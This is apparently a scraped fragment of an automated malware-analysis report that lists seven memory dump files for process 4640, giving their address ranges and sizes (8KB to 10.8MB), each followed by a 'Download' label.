                                                                                                  • memory/4640-0-0x00007FFDAF5C3000-0x00007FFDAF5C5000-memory.dmp

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    Download

                                                                                                  • memory/4640-97-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/4640-13-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/4640-12-0x000002502EC60000-0x000002502ECA6000-memory.dmp

                                                                                                    Filesize

                                                                                                    280KB

                                                                                                    Download

                                                                                                  • memory/4640-11-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/4640-10-0x00007FFDAF5C0000-0x00007FFDB0082000-memory.dmp

                                                                                                    Filesize

                                                                                                    10.8MB

                                                                                                    Download

                                                                                                  • memory/4640-6-0x0000025014570000-0x0000025014592000-memory.dmp

                                                                                                    Filesize

                                                                                                    136KB

                                                                                                    Download